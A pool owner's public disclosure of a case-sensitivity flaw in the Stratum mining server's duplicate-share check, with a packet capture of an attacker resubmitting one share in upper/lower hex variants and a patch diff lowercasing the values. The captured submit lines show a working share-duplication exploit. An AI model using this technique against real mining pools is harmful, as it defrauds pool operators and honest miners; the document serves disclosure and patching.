Hi
The Stratum Mining Software has a serious bug. It allows a Miner to send the same share several times without the duplicate check detecting it. With clever programming this can be more than 1000 shares that it should be in the worst case. Normally it is possible to get eight times the shares.
The problem is, that the duplicate check works with strings (nonce, extranonce...) and does check them case sensitive.
So the exploiter simply sends his values in all variations with small and big letters (because it is in hex)
example:
03:51:47.760512 IP 87.203.91.128.28348 > xxx.xxx.11.163.3333: Flags [P.], seq 535:1070, ack 216, win 64185, length 535
.m.g..h..P...kn..
{"id":913,"method":"mining.submit","params":["uphellper.5553", "424", "f5670100", "550cdcbf", "5d82727c"]}
{"id":913,"method":"mining.submit","params":["uphellper.5553", "424", "f5670100", "550cdcbf", "5d82727C"]}
{"id":913,"method":"mining.submit","params":["uphellper.5553", "424", "f5670100", "550cdcbf", "5D82727c"]}
{"id":913,"method":"mining.submit","params":["uphellper.5553", "424", "f5670100", "550cdcbf", "5D82727C"]}
{"id":913,"method":"mining.submit","params":["uphellper.5553", "424", "f5670100", "550cdcbF", "5d82727c"]}
03:51:47.859746 IP xxx.xxx.11.163.3333 > 87.203.91.128.28348: Flags [.], ack 1070, win 65535, length 0
.n..h..m.i.P........
03:51:47.951332 IP xxx.xxx.11.163.3333 > 87.203.91.128.28348: Flags [P.], seq 216:431, ack 1070, win 65535, length 215
.n..h..m.i.P....3..{"error": null, "id": 913, "result": true}
{"error": null, "id": 913, "result": true}
{"error": null, "id": 913, "result": true}
{"error": null, "id": 913, "result": true}
{"error": null, "id": 913, "result": true}
The diff for the fix looks like this:
file: stratum-mining/lib/template_registry.py
# Check for duplicated submit
- if not job.register_submit(extranonce1_bin, extranonce2, ntime, nonce):
+ if not job.register_submit(extranonce1_bin, extranonce2.lower(), ntime.lower(), nonce.lower()):
log.info("Duplicate from %s, (%s %s %s %s)" % \
The fix may be not complete though.
I understand that the pool owners and especially slush (his pool seems to have this fixed) do not share their hard work.
But to not release this bugfix is not what the bitcoin community stands for.
If anyone appreciates this public disclosure you can show it here: 19c4bA6qHLjnWgYQmS9VuqwHuNT6jR5Atz
Denis, owner of the small but old pool btcmp.com
PS: the user which attacked my pool had the name "uphellper". Shame on You!